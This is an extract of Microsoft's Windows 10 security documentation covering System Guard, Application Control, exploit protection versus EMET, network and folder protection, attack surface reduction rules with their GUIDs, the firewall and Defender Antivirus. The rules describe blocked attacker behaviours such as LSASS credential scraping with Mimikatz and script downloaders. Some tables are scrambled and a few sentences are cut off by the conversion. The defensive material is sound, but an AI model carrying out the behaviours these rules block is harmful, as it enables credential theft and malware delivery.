Secure Launch simplifies management of SRTM measurements because the launch code is now unrelated to a
specific hardware configuration. This means the number of valid code measurements is small, and future updates
can be deployed more widely and quickly.
System Management Mode (SMM ) protection
System Management Mode (SMM ) is a special-purpose CPU mode in x86 microcontrollers that handles power
management, hardware configuration, thermal monitoring, and anything else the manufacturer deems useful.
Whenever one of these system operations is requested, a non-maskable interrupt (SMI) is invoked at runtime,
which executes SMM code installed by the BIOS. SMM code executes in the highest privilege level and is invisible
to the OS, which makes it an attractive target for malicious activity. Even if System Guard Secure Launch is used to
late launch, SMM code can potentially access hypervisor memory and change the hypervisor. To defend against
this, two techniques are used:
1. Paging protection to prevent inappropriate access to code and data
2. SMM hardware supervision and attestation
Paging protection can be implemented to lock certain code tables to be read-only to prevent tampering. This
prevents access to any memory that has not been specifically assigned.
A hardware-enforced processor feature known as a supervisor SMI handler can monitor the SMM and make sure
it does not access any part of the address space that it is not supposed to.
SMM protection is built on top of the Secure Launch technology and requires it to function. In the future,
Windows 10 will also measure this SMI Handler’s behavior and attest that no OS -owned memory has been
tampered with.
Validating platform integrity after Windows is running (run time)

While Windows Defender System Guard provides advanced protection that will help protect and maintain the
integrity of the platform during boot and at run time, the reality is that we must apply an "assume breach"
mentality to even our most sophisticated security technologies. We should be able to trust that the technologies
are successfully doing their jobs, but we also need the ability to verify that they were successful in achieving their
goals. When it comes to platform integrity, we can’t just trust the platform, which potentially could be
compromised, to self-attest to its security state. So Windows Defender System Guard includes a series of
technologies that enable remote analysis of the device’s integrity.
As Windows 10 boots, a series of integrity measurements are taken by Windows Defender System Guard using
the device’s Trusted Platform Module 2.0 (TPM 2.0). System Guard Secure Launch will not support earlier TPM
versions, such as TPM 1.2. This process and data are hardware-isolated away from Windows to help ensure that
the measurement data is not subject to the type of tampering that could happen if the platform was compromised.
From here, the measurements can be used to determine the integrity of the device’s firmware, hardware
configuration state, and Windows boot-related components, just to name a few.
After the system boots, Windows Defender System Guard signs and seals these measurements using the TPM.
Upon request, a management system like Intune or System Center Configuration Manager can acquire them for
remote analysis. If Windows Defender System Guard indicates that the device lacks integrity, the management
system can take a series of actions, such as denying the device access to resources.
Windows Defender Application Control
Applies to:
Windows 10
Windows Server 2016
Windows Server 2019
With thousands of new malicious files created every day, using traditional methods like antivirus solutions—
signature-based detection to fight against malware—provides an inadequate defense against new attacks. In most
organizations, information is the most valuable asset, and ensuring that only approved users have access to that
information is imperative.
However, when a user runs a process, that process has the same level of access to data that the user has. As a
result, sensitive information could easily be deleted or transmitted out of the organization if a user knowingly or
unknowingly runs malicious software.
Application control is a crucial line of defense for protecting enterprises given today’s threat landscape, and it has
an inherent advantage over traditional antivirus solutions. Specifically, application control moves away from the
traditional application trust model where all applications are assumed trustworthy by default to one where
applications must earn trust in order to run. Many organizations, like the Australian Signals Directorate, understand
this and frequently cite application control as one of the most effective means for addressing the threat of
executable file-based malware (.exe, .dll, etc.).
Windows Defender Application Control (WDAC ) can help mitigate these types of security threats by restricting the
applications that users are allowed to run and the code that runs in the System Core (kernel). WDAC policies also
block unsigned scripts and MSIs, and Windows PowerShell runs in Constrained Language Mode.
NOTE
Prior to Windows 10, version 1709, Windows Defender Application Control was known as configurable code integrity policies.
WDAC System Requirements

WDAC policies can only be created on computers beginning with Windows 10 Enterprise or Professional editions
or Windows Server 2016. They can be applied to computers running any edition of Windows 10 or Windows
Server 2016 and optionally managed via Mobile Device Management (MDM ), such as Microsoft Intune. Group
Policy or Intune can be used to distribute WDAC policies.
New and changed functionality

Prior to Windows 10, version 1709, Windows Defender Application Control was known as Windows Defender
Device Guard configurable code integrity policies.
Beginning with Windows 10, version 1703, you can use WDAC not only to control applications, but also to control
whether specific plug-ins, add-ins, and modules can run from specific apps (such as a line-of-business application
or a browser). For more information, see Use a Windows Defender Application Control policy to control specific
plug-ins, add-ins, and modules.
See also
WDAC design guide
WDAC deployment guide
Protect devices from exploits
Applies to:
Exploit protection automatically applies a number of exploit mitigation techniques to operating system processes
and apps.
It is part of Windows Defender Exploit Guard. Exploit protection is supported beginning with Windows 10,
version 1709 and Windows Server 2016, version 1803.
TIP
You can visit the Windows Defender Testground website at demo.wd.microsoft.com to confirm the feature is working and
see how it works.
Exploit protection works best with Windows Defender Advanced Threat Protection - which gives you detailed
reporting into exploit protection events and blocks as part of the usual alert investigation scenarios.
You can enable exploit protection on an individual machine, and then use Group Policy to distribute the XML file
to multiple devices at once.
When a mitigation is encountered on the machine, a notification will be displayed from the Action Center. You can
customize the notification with your company details and contact information. You can also enable the rules
individually to customize what techniques the feature monitors.
You can also use audit mode to evaluate how exploit protection would impact your organization if it were enabled.
Many of the features in the Enhanced Mitigation Experience Toolkit (EMET) have been included in Exploit
protection, and you can convert and import existing EMET configuration profiles into Exploit protection. See
Comparison between Enhanced Mitigation Experience Toolkit and Windows Defender Exploit Guard for more
information on how Exploit protection supersedes EMET and what the benefits are when considering moving to
exploit protection on Windows 10.
IMPORTANT
If you are currently using EMET you should be aware that EMET reached end of life on July 31, 2018. You should consider
replacing EMET with exploit protection in Windows 10. You can convert an existing EMET configuration file into exploit
protection to make the migration easier and keep your existing settings.
WARNING
Some security mitigation technologies may have compatibility issues with some applications. You should test exploit
protection in all target use scenarios by using audit mode before deploying the configuration across a production
environment or the rest of your network.
Review exploit protection events in Windows Event Viewer

You can review the Windows event log to see events that are created when exploit protection blocks (or audits) an
app:
PROVIDER/SOURCE EVENT ID DESCRIPTION
Security-Mitigations 1 ACG audit
Security-Mitigations 2 ACG enforce
Security-Mitigations 3 Do not allow child processes audit
Security-Mitigations 4 Do not allow child processes block
Security-Mitigations 5 Block low integrity images audit
Security-Mitigations 6 Block low integrity images block
Security-Mitigations 7 Block remote images audit
Security-Mitigations 8 Block remote images block
Security-Mitigations 9 Disable win32k system calls audit
Security-Mitigations 10 Disable win32k system calls block
Security-Mitigations 11 Code integrity guard audit
Security-Mitigations 12 Code integrity guard block
Security-Mitigations 13 EAF audit
Security-Mitigations 14 EAF enforce
Security-Mitigations 15 EAF+ audit
Security-Mitigations 16 EAF+ enforce
Security-Mitigations 17 IAF audit
Security-Mitigations 18 IAF enforce
Security-Mitigations 19 ROP StackPivot audit
Security-Mitigations 20 ROP StackPivot enforce
Security-Mitigations 21 ROP CallerCheck audit
Security-Mitigations 22 ROP CallerCheck enforce
Security-Mitigations 23 ROP SimExec audit
Security-Mitigations 24 ROP SimExec enforce
WER-Diagnostics 5 CFG Block

PROVIDER/SOURCE EVENT ID DESCRIPTION
Win32K 260 Untrusted Font
Comparison between Enhanced Mitigation Experience Toolkit and

Windows Defender Exploit Guard
IMPORTANT
If you are currently using EMET, you should be aware that EMET reached end of life on July 31, 2018. You should consider
replacing EMET with exploit protection in Windows Defender ATP.
You can convert an existing EMET configuration file into exploit protection to make the migration easier and keep your
existing settings.
This section compares exploit protection in Windows Defender ATP with the Enhance Mitigation Experience
Toolkit (EMET) for reference. The table in this section illustrates the differences between EMET and Windows
Defender Exploit Guard.
WINDOWS DEFENDER EXPLOIT GUARD EMET
Windows versions
All versions of Windows 10 starting Windows 8.1; Windows 8; Windows 7
with version 1709 Cannot be installed on Windows 10,
version 1709 and later
Installation requirements Windows Security in Windows 10 Available only as an additional

(no additional installation required) download and must be installed onto a
Windows Defender Exploit Guard is management device
built into Windows - it doesn't require a
separate tool or package for
management, configuration, or
deployment.
User interface Modern interface integrated with the Older, complex interface that requires
Windows Security app considerable ramp-up training
Supportability
Dedicated submission-based support Ends after July 31, 2018
channel[1]
Part of the Windows 10 support
lifecycle
Updates
Ongoing updates and development of No planned updates or development
new features, released twice yearly as
part of the Windows 10 semi-annual
update channel
Exploit protection
All EMET mitigations plus new, specific Limited set of mitigations
mitigations (see table)
Can convert and import existing EMET
configurations
WINDOWS DEFENDER EXPLOIT GUARD EMET
Attack surface reduction[2]

Helps block known infection vectors Limited ruleset configuration only for
Can configure individual rules modules (no processes)
Network protection[2]
Helps block malicious network Not available
connections
Controlled folder access[2]

Helps protect important folders Not available
Configurable for apps and folders
Configuration with GUI (user interface)

Use Windows Security app to Requires installation and use of EMET
customize and manage configurations tool
Configuration with Group Policy

Use Group Policy to deploy and Available
manage configurations
Configuration with shell tools

Use PowerShell to customize and Requires use of EMET tool
manage configurations (EMET_CONF)

Use Configuration Manager to Not available
customize, deploy, and manage
configurations
Microsoft Intune
Use Intune to customize, deploy, and Not available
manage configurations
Reporting
With Windows event logs and full audit Limited Windows event log monitoring
mode reporting
Full integration with Windows Defender
Advanced Threat Protection
Audit mode
Full audit mode with Windows event Limited to EAF, EAF+, and anti-ROP
reporting mitigations
(1) Requires an enterprise subscription with Azure Active Directory or a Software Assurance ID.
(2) Additional requirements may apply (such as use of Windows Defender Antivirus). See Windows Defender
Exploit Guard requirements for more details. Customizable mitigation options that are configured with exploit
protection do not require Windows Defender Antivirus.
Mitigation comparison
The mitigations available in EMET are included in Windows Defender Exploit Guard, under the exploit protection
feature.
The table in this section indicates the availability and support of native mitigations between EMET and exploit
protection.
AVAILABLE IN WINDOWS DEFENDER
MITIGATION EXPLOIT GUARD AVAILABLE IN EMET
Arbitrary code guard (ACG)

As "Memory Protection Check"
Block remote images

As "Load Library Check"
Block untrusted fonts
Data Execution Prevention (DEP)
Export address filtering (EAF)
Force randomization for images

(Mandatory ASLR)
NullPage Security Mitigation

Included natively in Windows 10
See Mitigate threats by using Windows
10 security features for more
information
Randomize memory allocations

(Bottom-Up ASLR)
Simulate execution (SimExec)
Validate API invocation (CallerCheck)
Validate exception chains (SEHOP)
Validate stack integrity (StackPivot)
Certificate trust (configurable certificate Windows 10 provides enterprise

pinning) certificate pinning
Heap spray allocation Ineffective against newer browser-

based exploits; newer mitigations
provide better protection
See Mitigate threats by using Windows
10 security features for more
information
Block low integrity images
Code integrity guard
Disable extension points
Disable Win32k system calls
Do not allow child processes

AVAILABLE IN WINDOWS DEFENDER
MITIGATION EXPLOIT GUARD AVAILABLE IN EMET
Import address filtering (IAF)
Validate handle usage
Validate heap integrity
Validate image dependency integrity
NOTE
The Advanced ROP mitigations that are available in EMET are superseded by ACG in Windows 10, which other EMET
advanced settings are enabled by default in Windows Defender Exploit Guard as part of enabling the anti-ROP mitigations
for a process.
See the Mitigation threats by using Windows 10 security features for more information on how Windows 10 employs
existing EMET technology.
Related topics
Evaluate exploit protection
Enable exploit protection
Configure and audit exploit protection mitigations
Import, export, and deploy exploit protection configurations
Troubleshoot exploit protection
Protect your network
Applies to:
Network protection helps reduce the attack surface of your devices from Internet-based events. It prevents
employees from using any application to access dangerous domains that may host phishing scams, exploits, and
other malicious content on the Internet.
It expands the scope of Windows Defender SmartScreen to block all outbound HTTP (s) traffic that attempts to
connect to low -reputation sources (based on the domain or hostname).
Network protection is supported beginning with Windows 10, version 1709.
TIP
You can visit the Windows Defender Testground website at demo.wd.microsoft.com to confirm the feature is working and
see how it works.
Network protection works best with Windows Defender Advanced Threat Protection, which gives you detailed
reporting into Windows Defender EG events and blocks as part of the usual alert investigation scenarios.
When network protection blocks a connection, a notification will be displayed from the Action Center. You can
customize the notification with your company details and contact information. You can also enable the rules
You can also use audit mode to evaluate how Network protection would impact your organization if it were
enabled.
Requirements
Network protection requires Windows 10 Pro, Enterprise E3, E5 and Windows Defender AV real-time protection.
WINDOWS 10 VERSION WINDOWS DEFENDER ANTIVIRUS
Windows 10 version 1709 or later Windows Defender AV real-time protection and cloud-
delivered protection must be enabled
Review network protection events in the Windows Defender ATP

Security Center
Windows Defender ATP provides detailed reporting into events and blocks as part of its alert investigation
scenarios.
You can query Windows Defender ATP data by using Advanced hunting. If you're using audit mode, you can use
Advanced hunting to see how network protection settings would affect your environment if they were enabled.
Review network protection events in Windows Event Viewer

You can review the Windows event log to see events that are created when network protection blocks (or audits)
access to a malicious IP or domain:
1. Copy the XML directly.
2. Click OK.
3. This will create a custom view that filters to only show the following events related to network protection:
EVENT ID DESCRIPTION
5007 Event when settings are changed
1125 Event when network protection fires in audit mode
1126 Event when network protection fires in block mode
Related topics
TOPIC DESCRIPTION
Evaluate network protection Undertake a quick scenario that demonstrate how the feature
works, and what events would typically be created.
Enable network protection Use Group Policy, PowerShell, or MDM CSPs to enable and
manage network protection in your network.
Protect important folders with controlled folder
access
Applies to:
Controlled folder access helps you protect valuable data from malicious apps and threats, such as ransomware.
Controlled folder access is supported on Windows Server 2019 as well as Windows 10 clients. Controlled folder
access works best with Windows Defender Advanced Threat Protection, which gives you detailed reporting into
controlled folder access events and blocks as part of the usual alert investigation scenarios.
All apps (any executable file, including .exe, .scr, .dll files and others) are assessed by Windows Defender Antivirus,
which then determines if the app is malicious or safe. If the app is determined to be malicious or suspicious, then
it will not be allowed to make changes to any files in any protected folder.
This is especially useful in helping to protect your documents and information from ransomware that can attempt
to encrypt your files and hold them hostage.
A notification will appear on the computer where the app attempted to make changes to a protected folder. You
can customize the notification with your company details and contact information. You can also enable the rules
The protected folders include common system folders, and you can add additional folders. You can also allow or
whitelist apps to give them access to the protected folders.
You can use audit mode to evaluate how controlled folder access would impact your organization if it were
enabled. You can also visit the Windows Defender Testground website at demo.wd.microsoft.com to confirm the
feature is working and see how it works.
Controlled folder access is supported on Windows 10, version 1709 and later and Windows Server 2019.
Requirements
Controlled folder access requires enabling Windows Defender Antivirus real-time protection.
Review controlled folder access events in the Windows Defender ATP

Security Center
Windows Defender ATP provides detailed reporting into events and blocks as part of its alert investigation
scenarios.
You can query Windows Defender ATP data by using Advanced hunting. If you're using audit mode, you can use
Advanced hunting to see how controlled folder access settings would affect your environment if they were
enabled.
Review controlled folder access events in Windows Event Viewer

You can review the Windows event log to see events that are created when controlled folder access blocks (or
audits) an app:
1. Download the Exploit Guard Evaluation Package and extract the file cfa -events.xml to an easily accessible
location on the machine.
2. Type Event viewer in the Start menu to open the Windows Event Viewer.
3. On the left panel, under Actions, click Import custom view....
4. Navigate to where you extracted cfa -events.xml and select it. Alternatively, copy the XML directly.
5. Click OK.
6. This will create a custom view that filters to only show the following events related to controlled folder
access:
1124 Audited controlled folder access event
1123 Blocked controlled folder access event
In this section
TOPIC DESCRIPTION
Evaluate controlled folder access Use a dedicated demo tool to see how controlled folder
access works, and what events would typically be created.
Enable controlled folder access Use Group Policy, PowerShell, or MDM CSPs to enable and
manage controlled folder access in your network
Customize controlled folder access Add additional protected folders, and allow specified apps to
access protected folders.
Reduce attack surfaces with attack surface reduction
rules
Applies to:
Attack surface reduction rules help prevent behaviors malware often uses to infect computers with malicious
code. You can set attack surface reduction rules for computers running Windows 10, version 1709 or later,
Windows Server 2016 1803 or later, or Windows Server 2019.
To use attack surface reduction rules, you need a Windows 10 Enterprise E3 license or higher. A Windows E5
license gives you the advanced management capabilities to power them. These include monitoring, analytics, and
workflows available in Windows Defender Advanced Threat Protection, as well as reporting and configuration
capabilities in the M365 Security Center. These advanced capabilities aren't available with an E3 license, but you
can use attack surface reduction rule events in Event Viewer to help facilitate deployment.
Attack surface reduction rules target behaviors that malware and malicious apps typically use to infect computers,
including:
Executable files and scripts used in Office apps or web mail that attempt to download or run files
Obfuscated or otherwise suspicious scripts
Behaviors that apps don't usually initiate during normal day-to-day work
You can use audit mode to evaluate how attack surface reduction rules would impact your organization if they
were enabled. It's best to run all rules in audit mode first so you can understand their impact on your line-of-
business applications. Many line-of-business applications are written with limited security concerns, and they
may perform tasks similar to malware. By monitoring audit data and adding exclusions for necessary
applications, you can deploy attack surface reduction rules without impacting productivity.
Triggered rules display a notification on the device. You can customize the notification with your company details
and contact information. The notification also displays in the Windows Defender Security Center and in the
Microsoft 365 securty center.
For information about configuring attack surface reduction rules, see Enable attack surface reduction rules.
Review attack surface reduction events in Windows Event Viewer

You can review the Windows event log to view events that are created when attack surface reduction rules fire:
1. Download the Exploit Guard Evaluation Package and extract the file cfa -events.xml to an easily accessible
location on the machine.
2. Type Event Viewer in the Start menu to open the Windows Event Viewer.
3. Click Import custom view... on the left panel, under Actions.
4. Select the file cfa -events.xml from where it was extracted. Alternatively, copy the XML directly.
5. Click OK.
This will create a custom view that filters to only show the following events related to controlled folder access:
1121 Event when rule fires in Block-mode
1122 Event when rule fires in Audit-mode

The following sections describe each of the 15 attack surface reduction rules. This table shows their
corresponding GUIDs, which you use if you're configuring the rules with Group Policy or PowerShell. If you use
System Center Configuration Manager or Microsoft Intune, you do not need the GUIDs:
RULE NAME GUID FILE & FOLDER EXCLUSIONS
Block executable content from email BE9BA2D9-53EA-4CDC-84E5- Supported

client and webmail 9B1EEEE46550
Block all Office applications from D4F940AB-401B-4EFC-AADC- Supported

creating child processes AD5F3C50688A
Block Office applications from creating 3B576869-A4EC-4529-8536- Supported

executable content B80A7769E899
Block Office applications from injecting 75668C1F-73B5-4CF0-BB93- Supported

code into other processes 3ECF5CB7CC84
Block JavaScript or VBScript from D3E037E1-3EB8-44C8-A917- Not supported

launching downloaded executable 57927947596D
content
Block execution of potentially 5BEB7EFE-FD9A-4556-801D- Supported

obfuscated scripts 275E5FFC04CC
Block Win32 API calls from Office 92E97FA1-2EDF-4476-BDD6- Supported

macro 9DD0B4DDDC7B
Block executable files from running 01443614-cd74-433a-b99e- Supported

unless they meet a prevalence, age, or 2ecdc07bfc25
trusted list criterion
Use advanced protection against c1db55ab-c21a-4637-bb3f- Supported

ransomware a12568109d35
Block credential stealing from the 9e6c4e1f-7d60-472f-ba1a- Supported

Windows local security authority a39ef669e4b2
subsystem (lsass.exe)
Block process creations originating d1e49aac-8f56-4280-b9ba- Not supported

from PSExec and WMI commands 993a6d77406c
Block untrusted and unsigned b2b3f03d-6a65-4f7b-a9c7- Supported

processes that run from USB 1c7ef74a9ba4
RULE NAME GUID FILE & FOLDER EXCLUSIONS
Block Office communication application 26190899-1602-49e8-8b27- Supported

from creating child processes eb1d0a1ce869
Block Adobe Reader from creating child 7674ba52-37eb-4a4f-a9a1- Supported

processes f0f9a1619a2c
Each rule description indicates which apps or file types the rule applies to. In general, the rules for Office apps
apply to only Word, Excel, PowerPoint, and OneNote, or they apply to Outlook. Except where specified, attack
surface reduction rules don't apply to any other Office apps.
Block executable content from email client and webmail
This rule blocks the following file types from launching from email in Microsoft Outlook or Outlook.com and
other popular webmail providers:
Executable files (such as .exe, .dll, or .scr)
Script files (such as a PowerShell .ps, VisualBasic .vbs, or JavaScript .js file)
Intune name: Execution of executable content (exe, dll, ps, js, vbs, etc.) dropped from email (webmail/mail client)
(no exceptions)
SCCM name: Block executable content from email client and webmail
GUID: BE9BA2D9-53EA-4CDC -84E5-9B1EEEE46550
Block all Office applications from creating child processes
This rule blocks Office apps from creating child processes. This includes Word, Excel, PowerPoint, OneNote, and
Access.
This is a typical malware behavior, especially malware that abuses Office as a vector, using VBA macros and
exploit code to download and attempt to run additional payload. Some legitimate line-of-business applications
might also use behaviors like this, including spawning a command prompt or using PowerShell to configure
registry settings.
Intune name: Office apps launching child processes
SCCM name: Block Office application from creating child processes
GUID: D4F940AB -401B -4EFC -AADC -AD5F3C50688A
Block Office applications from creating executable content
This rule prevents Office apps, including Word, Excel, and PowerPoint, from creating executable content.
This rule targets a typical behavior where malware uses Office as a vector to break out of Office and save
malicious components to disk, where they persist and survive a computer reboot. This rule prevents malicious
code from being written to disk.
Intune name: Office apps/macros creating executable content
SCCM name: Block Office applications from creating executable content
GUID: 3B576869-A4EC -4529-8536-B80A7769E899
Block Office applications from injecting code into other processes
Attackers might attempt to use Office apps to migrate malicious code into other processes through code
injection, so the code can masquerade as a clean process. This rule blocks code injection attempts from Office
apps into other processes. There are no known legitimate business purposes for using code injection.
This rule applies to Word, Excel, and PowerPoint.
Intune name: Office apps injecting code into other processes (no exceptions)
SCCM name: Block Office applications from injecting code into other processes
GUID: 75668C1F -73B5-4CF0-BB93-3ECF5CB7CC84
Block JavaScript or VBScript from launching downloaded executable content
Malware often uses JavaScript and VBScript scripts to launch other malicious apps.
Malware written in JavaScript or VBS often acts as a downloader to fetch and launch additional native payload
from the Internet. This rule prevents scripts from launching downloaded content, helping to prevent malicious
use of the scripts to spread malware and infect machines. This isn't a common line-of-business use, but line-of-
business applications sometimes use scripts to download and launch installers. You can exclude scripts so they're
allowed to run.
IMPORTANT
File and folder exclusions don't apply to this attack surface reduction rule.
Intune name: js/vbs executing payload downloaded from Internet (no exceptions)
SCCM name: Block JavaScript or VBScript from launching downloaded executable content
GUID: D3E037E1-3EB8-44C8-A917-57927947596D
Block execution of potentially obfuscated scripts
Script obfuscation is a common technique that both malware authors and legitimate applications use to hide
intellectual property or decrease script loading times. This rule detects suspicious properties within an obfuscated
script.
Intune name: Obfuscated js/vbs/ps/macro code
SCCM name: Block execution of potentially obfuscated scripts.
GUID: 5BEB7EFE -FD9A-4556-801D -275E5FFC04CC
Block Win32 API calls from Office macros
Office VBA provides the ability to use Win32 API calls, which malicious code can abuse. Most organizations don't
use this functionality, but might still rely on using other macro capabilities. This rule allows you to prevent using
Win32 APIs in VBA macros, which reduces the attack surface.
Intune name: Win32 imports from Office macro code
SCCM name: Block Win32 API calls from Office macros
GUID: 92E97FA1-2EDF -4476-BDD6-9DD0B4DDDC7B
Block executable files from running unless they meet a prevalence, age, or trusted list criterion
This rule blocks the following file types from launching unless they either meet prevalence or age criteria, or
they're in a trusted list or exclusion list:
NOTE
You must enable cloud-delivered protection to use this rule.
IMPORTANT
The rule Block executable files from running unless they meet a prevalence, age, or trusted list criterion with GUID
01443614-cd74-433a-b99e-2ecdc07bfc25 is owned by Microsoft and is not specified by admins. It uses cloud-delivered
protection to update its trusted list regularly.
You can specify individual files or folders (using folder paths or fully qualified resource names) but you can't specify which
rules or exclusions apply to.
Intune name: Executables that don't meet a prevalence, age, or trusted list criteria.
SCCM name: Block executable files from running unless they meet a prevalence, age, or trusted list criteria
GUID: 01443614-cd74-433a-b99e-2ecdc07bfc25
Use advanced protection against ransomware
This rule provides an extra layer of protection against ransomware. It scans executable files entering the system
to determine whether they're trustworthy. If the files closely resemble ransomware, this rule blocks them from
running, unless they're in a trusted list or exclusion list.
NOTE
You must enable cloud-delivered protection to use this rule.
Intune name: Advanced ransomware protection

SCCM name: Use advanced protection against ransomware
GUID: c1db55ab-c21a-4637-bb3f-a12568109d35
Block credential stealing from the Windows local security authority subsystem (lsass.exe )
Local Security Authority Subsystem Service (LSASS ) authenticates users who log in to a Windows computer.
Windows Defender Credential Guard in Windows 10 normally prevents attempts to extract credentials from
LSASS. However, some organizations can't enable Credential Guard on all of their computers because of
compatibility issues with custom smartcard drivers or other programs that load into the Local Security Authority
(LSA). In these cases, attackers can use tools like Mimikatz to scrape cleartext passwords and NTLM hashes from
LSASS. This rule helps mitigate that risk by locking down LSASS.
NOTE
In some apps, the code enumerates all running processes and attempts to open them with exhaustive permissions. This
rule denies the app's process open action and logs the details to the security event log. This rule can generate a lot of noise.
If you have an app that overly enumerates LSASS, you need to add it to the exclusion list. By itself, this event log entry
doesn't necessarily indicate a malicious threat.
Intune name: Flag credential stealing from the Windows local security authority subsystem
SCCM name: Block credential stealing from the Windows local security authority subsystem
GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2
Block process creations originating from PSExec and WMI commands
This rule blocks processes through PsExec and WMI commands from running, to prevent remote code execution
that can spread malware attacks.
IMPORTANT
File and folder exclusions do not apply to this attack surface reduction rule.
WARNING
Only use this rule if you're managing your devices with Intune or another MDM solution. This rule is incompatible with
management through System Center Configuration Manager because this rule blocks WMI commands the SCCM client
uses to function correctly.
Intune name: Process creation from PSExec and WMI commands

SCCM name: Not applicable
GUID: d1e49aac-8f56-4280-b9ba-993a6d77406c
Block untrusted and unsigned processes that run from USB
With this rule, admins can prevent unsigned or untrusted executable files from running from USB removable
drives, including SD cards. Blocked file types include:
Script files (such as a PowerShell .ps, VisualBasic .vbs, or JavaScript .js file)
Intune name: Untrusted and unsigned processes that run from USB
SCCM name: Block untrusted and unsigned processes that run from USB
GUID: b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4
Block Office communication application from creating child processes
This rule prevents Outlook from creating child processes. It protects against social engineering attacks and
prevents exploit code from abusing a vulnerability in Outlook. To achieve this, the rule prevents the launch of
additional payload while still allowing legitimate Outlook functions. It also protects against Outlook rules and
forms exploits that attackers can use when a user's credentials are compromised.
NOTE
This rule applies to Outlook and Outlook.com only.
Intune name: Process creation from Office communication products (beta)

SCCM name: Not yet available
GUID: 26190899-1602-49e8-8b27-eb1d0a1ce869
Block Adobe Reader from creating child processes
Through social engineering or exploits, malware can download and launch additional payloads and break out of
Adobe Reader. This rule prevents attacks like this by blocking Adobe Reader from creating additional processes.
Intune name: Process creation from Adobe Reader (beta)
SCCM name: Not applicable
GUID: 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c
Related topics
Enable attack surface reduction rules
Evaluate attack surface reduction rules
Windows Defender Firewall with Advanced Security
Applies to
Windows 10
Windows Server 2016
This is an overview of the Windows Defender Firewall with Advanced Security (WFAS ) and Internet Protocol
security (IPsec) features.
Feature description
Windows Defender Firewall with Advanced Security is an important part of a layered security model. By providing
host-based, two-way network traffic filtering for a device, Windows Defender Firewall blocks unauthorized
network traffic flowing into or out of the local device. Windows Defender Firewall also works with Network
Awareness so that it can apply security settings appropriate to the types of networks to which the device is
connected. Windows Defender Firewall and Internet Protocol Security (IPsec) configuration settings are integrated
into a single Microsoft Management Console (MMC ) named Windows Defender Firewall, so Windows Defender
Firewall is also an important part of your network’s isolation strategy.
Practical applications
To help address your organizational network security challenges, Windows Defender Firewall offers the following
benefits:
Reduces the risk of network security threats. Windows Defender Firewall reduces the attack surface of a
device, providing an additional layer to the defense-in-depth model. Reducing the attack surface of a device
increases manageability and decreases the likelihood of a successful attack.
Safeguards sensitive data and intellectual property. With its integration with IPsec, Windows
Defender Firewall provides a simple way to enforce authenticated, end-to-end network communications. It
provides scalable, tiered access to trusted network resources, helping to enforce integrity of the data, and
optionally helping to protect the confidentiality of the data.
Extends the value of existing investments. Because Windows Defender Firewall is a host-based firewall
that is included with the operating system, there is no additional hardware or software required. Windows
Defender Firewall is also designed to complement existing non-Microsoft network security solutions
through a documented application programming interface (API).
In this section
TOPIC DESCRIPTION
Isolating Microsoft Store Apps on Your Network You can customize your Windows Defender Firewall
configuration to isolate the network access of Microsoft Store
apps that run on devices.
Securing End-to-End IPsec Connections by Using IKEv2 You can use IKEv2 to help secure your end-to-end IPSec
connections.
TOPIC DESCRIPTION
Windows Defender Firewall with Advanced Security Learn more about using Windows PowerShell to manage the
Administration with Windows PowerShell Windows Defender Firewall.
Windows Defender Firewall with Advanced Security Design Learn how to create a design for deploying Windows
Guide Defender Firewall with Advanced Security.
Windows Defender Firewall with Advanced Security Learn how to deploy Windows Defender Firewall with
Deployment Guide Advanced Security.
Windows Defender Antivirus in Windows 10 and
Windows Server 2016
Applies to:
Windows Defender Antivirus is a built-in antimalware solution that provides next generation protection for
desktops, portable computers, and servers.
Windows Defender Antivirus includes:
Cloud-delivered protection for near-instant detection and blocking of new and emerging threats. Along
with machine learning and the Intelligent Security Graph, cloud-delivered protection is part of the next-
gen technologies that power Windows Defender Antivirus.
Always-on scanning, using advanced file and process behavior monitoring and other heuristics (also
known as "real-time protection")
Dedicated protection updates based on machine-learning, human and automated big-data analysis, and
in-depth threat resistance research
You can configure and manage Windows Defender Antivirus with:
System Center Configuration Manager (as System Center Endpoint Protection, or SCEP )
Microsoft Intune
PowerShell
Windows Management Instrumentation (WMI)
Group Policy
TIP
You can visit the Windows Defender Testground website at demo.wd.microsoft.com to confirm the following features
are working and see how they work:
Cloud-delivered protection
Fast learning (including Block at first sight)
Potentially unwanted application blocking
What's new in Windows 10, version 1803

The block at first sight feature can now block non-portable executable files (such as JS, VBS, or macros)
as well as executable files.
The Virus & threat protection area in the Windows Security app now includes a section for ransomware
protection. It includes controlled folder access settings and ransomware recovery settings.
What's new in Windows 10, version 1703

New features for Windows Defender Antivirus in Windows 10, version 1703 include:
Updates to how the block at first sight feature can be configured
The ability to specify the level of cloud-protection
Windows Defender Antivirus protection in the Windows Security app
We've expanded this documentation library to cover end-to-end deployment, management, and
configuration for Windows Defender Antivirus, and we've added some new guides that can help with
evaluating and deploying Windows Defender AV in certain scenarios:
Evaluation guide for Windows Defender Antivirus
Deployment guide for Windows Defender Antivirus in a virtual desktop infrastructure environment
Minimum system requirements

Windows Defender AV has the same hardware requirements as Windows 10. For more information, see:
Minimum hardware requirements
Hardware component guidelines
Functionality, configuration, and management is largely the same when using Windows Defender AV on
Windows Server 2016; however, there are some differences.
Related topics
Windows Defender AV in the Windows Security app
Windows Defender AV on Windows Server 2016
Windows Defender AV compatibility
Evaluate Windows Defender AV protection
Deploy, manage updates, and report on Windows Defender AV
Configure Windows Defender AV features
Review event logs and error codes to troubleshoot issues
Reference topics for management and configuration tools
Overview of endpoint detection and response
Applies to:
Windows Defender ATP endpoint detection and response capabilities provide advanced attack detections that are
near real-time and actionable. Security analysts can prioritize alerts effectively, gain visibility into the full scope of a
breach, and take response actions to remediate threats.
When a threat is detected, alerts are created in the system for an analyst to investigate. Alerts with the same attack
techniques or attributed to the same attacker are aggregated into an entity called an incident. Aggregating alerts in
this manner makes it easy for analysts to collectively investigate and respond to threats.
Inspired by the "assume breach" mindset, Windows Defender ATP continuously collects behavioral cyber
telemetry. This includes process information, network activities, deep optics into the kernel and memory manager,
user login activities, registry and file system changes, and others. The information is stored for six months,
enabling an analyst to travel back in time to the start of an attack. The analyst can then pivot in various views and
approach an investigation through multiple vectors.
The response capabilities give you the power to promptly remediate threats by acting on the affected entities.
In this section
TOPIC DESCRIPTION
Security operations dashboard Explore a high level overview of detections, highlighting where
response actions are needed.
Incidents queue View and organize the incidents queue, and manage and
investigate alerts.
Alerts queue View and organize the machine alerts queue, and manage and
investigate alerts.
Machines list Investigate machines with generated alerts and search for
specific events over time.
